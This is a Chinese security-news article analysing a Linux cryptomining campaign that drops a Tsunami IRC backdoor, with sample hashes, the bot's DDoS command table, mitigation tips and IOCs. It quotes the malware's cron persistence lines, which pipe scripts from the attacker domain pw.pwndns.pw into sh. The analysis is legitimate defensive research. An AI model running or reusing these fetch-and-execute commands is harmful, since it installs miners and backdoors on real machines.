freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

新型挖矿病毒借助“海啸”僵尸网络发动DDOS攻击
2020-06-23 10:00:24

近期一直处于低迷状态的挖矿病毒有复苏迹象,不仅“驱动人生”挖矿病毒出现频繁更新,而且还出现了多个新型挖矿病毒。近日,亚信安全截获一系列shell脚本与ELF文件,其隐藏在受感染Linux设备的计划任务中,通过定时任务的方式下载并执行挖矿程序和后门程序。

详细分析

Shell样本分析

文件名:update.sh

MD5:66881d8da46aca98e0c2aa2flaf530c0

文件大小:1372字节

格式:Linux Shell

该样本首先获取当前用户ID,用于后续判断是否为管理员组;获取CPU架构,以下载相匹配的恶意程序;获取设备公网IP地址,用于后续判断下载何种恶意程序。

hxxp://pw.pwndns.pw/servers/server.txt中总计列出8458条公网IP地址。当受感染设备的公网地址匹配到server.txt的列表,将下载后门程序、提升执行权限。如果脚本运行的用户属于Root组,还会进一步打开SSH服务;当受感染设备未匹配到server.txt中列出的地址时,将下载挖矿程序、提升执行权限。

下图是此脚本的运行逻辑

下载的挖矿程序分析

文件名:x86_64_miner

MD5:812C64B55D4A28D902BF155530930B68

文件大小:2556332 字节

格式:ELF

是否有壳:UPX3.95

该挖矿程序带有UPX3.95壳,脱壳后发现其是根据Xmrig程序编写的挖矿程序,带有pwnRig字符串。

其通过访问/proc/hwloc-nofile-info和/proc/cpuinfo,获取CPU相关信息。

通过抓包获取到钱包地址为:

46VfQmxKRmjSsMRYux3r6qJvxwdVCmZfUFkPqt1uUfikSSy2wJFbcDzdX2ZuH4hDzs7xS8Nsy5orNTMtQUJADuavC2vV1Rp

下载的后门程序分析

文件名:x86_64

MD5:4FF3BA68D0F154E98222BAD4DAF0F253

文件大小:188648 字节

格式:ELF

是否有壳:UPX3.95

该后门程序同样带有UPX3.95壳,脱壳后发现其是多功能后门程序,其可以连接到IRC中继聊天C&C服务器。

通过PID,PPID和Time组成nick昵称,区分不同用户。

通过发送指令,可以对客户端执行如下操作:

指令功能
376加入频道
433生成一个新的nick name
NICK修改客户端Nick
Tsunami发起DDOS攻击
KILLALL中止DDOS攻击
Pan发起SYN flood
UDP发起UDP flood
Enable允许从此客户端发出的所有packet
Disable禁止从此客户端发出的所有packet
GET下载文件

376:加入频道:

433:生成一个新的nick name:

NICK:修改客户端Nick

Tsunami:发起DDOS攻击

KILLALL:中止DDOS攻击

Pan:发起SYN flood

UDP:发起UDP flood

Enable:允许从此客户端发出的所有packet

Disable:禁止从此客户端发出的所有packet

GET:下载文件

HELP:显示指令用法,列出了所有可用指令及功能

相关脚本文件分析

文件名:reboot.sh

MD5:ed445fa9bfa00d1235f44679c7023c6a

文件大小:2541字节

格式:Linux Shell

其收集计算机相关信息,通过邮件发送给病毒作者。

持久化例程:

/var/spool/cron/user中写入

* * * * */var/tmp/.systemd/.systemd

* * * * */var/tmp/.update/.update

*/10 * * * *curl -fsSLhttp://pw.pwndns.pw/update.sh| sh -s uc

@reboot curl-fsSLhttp://pw.pwndns.pw/reboot.sh| sh

解决方案

尽量关闭不必要的文件共享;

采用高强度的密码,避免使用弱口令密码,并定期更换密码;

打开系统自动更新,并检测更新进行安装;

IOCs

MD5文件名亚信安全检测名
4ff3ba68d0f154e98222bad4daf0f253x86_64Backdoor.Linux.TSUNAMI.AMQ
66881d8da46aca98e0c2aa2flaf530c0update.shCoinminer.SH.PWMINER.A
812C64B55D4A28D902BF155530930B68x86_64_minerCoinminer.Linux.TOOLBTC.AA
ed445fa9bfa00d1235f44679c7023c6areboot.shTrojan.SH.INFOPERL.A

Domain

Xmr-rx0.pwndns.pw

pw.pwndns.pw

pwn.pwndns.pw

IP

185.183.97.209

185.45.192.135

51.79.74.212

*本文作者:亚信安全,转载请注明来自FreeBuf.COM

# 僵尸网络 # ddos攻击 # 挖矿病毒 # 海啸
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者